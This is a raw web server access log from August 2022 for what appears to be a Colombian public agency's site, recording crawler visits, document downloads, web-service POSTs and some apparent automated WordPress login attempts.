207.46.13.115 - - [30/Aug/2022:02:48:58 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
157.55.39.80 - - [30/Aug/2022:02:49:07 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
207.46.13.51 - - [30/Aug/2022:02:48:55 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Fauna-gif.gif HTTP/1.1" 200 3779027
157.55.39.80 - - [30/Aug/2022:02:49:07 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [30/Aug/2022:02:48:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:02:49:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
172.22.2.4 - - [30/Aug/2022:02:51:15 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [30/Aug/2022:02:51:18 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
172.22.2.4 - - [30/Aug/2022:02:52:10 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2024%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 304 -
201.245.192.253 - - [30/Aug/2022:02:52:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.119.81.100 - - [30/Aug/2022:02:52:49 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [30/Aug/2022:02:52:50 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [30/Aug/2022:02:53:11 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 304 -
157.55.39.80 - - [30/Aug/2022:02:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/0123.pdf HTTP/1.1" 200 388896
216.245.221.92 - - [30/Aug/2022:02:53:32 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.105 - - [30/Aug/2022:02:54:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [30/Aug/2022:02:54:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
66.249.79.111 - - [30/Aug/2022:02:55:18 -0500] "-" 408 -
172.22.2.4 - - [30/Aug/2022:02:54:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:02:54:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [30/Aug/2022:02:57:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
207.46.13.115 - - [30/Aug/2022:02:57:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=mihzrdqosnxo9hbhpgptfbot.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
216.245.221.92 - - [30/Aug/2022:02:58:32 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.51 - - [30/Aug/2022:02:59:36 -0500] "GET /portaldeninos/wp-content/uploads/2021/10/infografia-fauna-ni%C3%B1os-ambientic-15x50.jpg HTTP/1.1" 200 1049
172.22.2.4 - - [30/Aug/2022:02:59:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:02:09 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
201.245.192.253 - - [30/Aug/2022:03:02:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [30/Aug/2022:03:00:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
66.249.79.111 - - [30/Aug/2022:03:02:38 -0500] "-" 408 -
207.46.13.115 - - [30/Aug/2022:03:03:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4329.pdf HTTP/1.1" 200 341980
216.245.221.92 - - [30/Aug/2022:03:03:32 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.107 - - [30/Aug/2022:03:06:53 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [30/Aug/2022:03:06:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [30/Aug/2022:03:07:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [30/Aug/2022:03:05:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:06:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
66.249.79.111 - - [30/Aug/2022:03:08:24 -0500] "-" 408 -
216.245.221.92 - - [30/Aug/2022:03:08:32 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.8 - - [30/Aug/2022:03:11:23 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
34.90.230.182 - - [30/Aug/2022:03:12:13 -0500] "GET / HTTP/1.1" 200 319
34.90.230.182 - - [30/Aug/2022:03:12:13 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [30/Aug/2022:03:12:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [30/Aug/2022:03:11:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [30/Aug/2022:03:13:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:13:56 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 304 -
172.22.2.4 - - [30/Aug/2022:03:12:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
66.249.79.111 - - [30/Aug/2022:03:14:47 -0500] "-" 408 -
201.245.192.253 - - [30/Aug/2022:03:17:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
35.240.117.238 - - [30/Aug/2022:03:18:17 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
40.77.167.40 - - [30/Aug/2022:03:18:20 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
172.22.2.4 - - [30/Aug/2022:03:18:26 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
40.77.167.40 - - [30/Aug/2022:03:18:30 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 200 89596
216.245.221.92 - - [30/Aug/2022:03:18:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:18:39 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [30/Aug/2022:03:18:44 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [30/Aug/2022:03:18:45 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
35.240.117.238 - - [30/Aug/2022:03:18:44 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
172.22.2.4 - - [30/Aug/2022:03:18:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [30/Aug/2022:03:18:47 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [30/Aug/2022:03:18:49 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [30/Aug/2022:03:18:57 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [30/Aug/2022:03:18:58 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
207.46.13.16 - - [30/Aug/2022:03:19:03 -0500] "GET /BLA/resoluciones/AUTOS%202019/0886.pdf HTTP/1.1" 200 263309
172.22.2.4 - - [30/Aug/2022:03:17:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:18:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55621
201.245.192.253 - - [30/Aug/2022:03:20:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42754
201.245.192.253 - - [30/Aug/2022:03:20:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42458
66.249.79.111 - - [30/Aug/2022:03:21:41 -0500] "-" 408 -
201.245.192.253 - - [30/Aug/2022:03:22:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [30/Aug/2022:03:23:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:23:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:24:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [30/Aug/2022:03:27:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.79.111 - - [30/Aug/2022:03:27:32 -0500] "-" 408 -
216.245.221.92 - - [30/Aug/2022:03:28:32 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [30/Aug/2022:03:29:53 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [30/Aug/2022:03:29:54 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
201.245.192.253 - - [30/Aug/2022:03:30:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42754
201.245.192.253 - - [30/Aug/2022:03:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42458
172.22.2.4 - - [30/Aug/2022:03:29:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
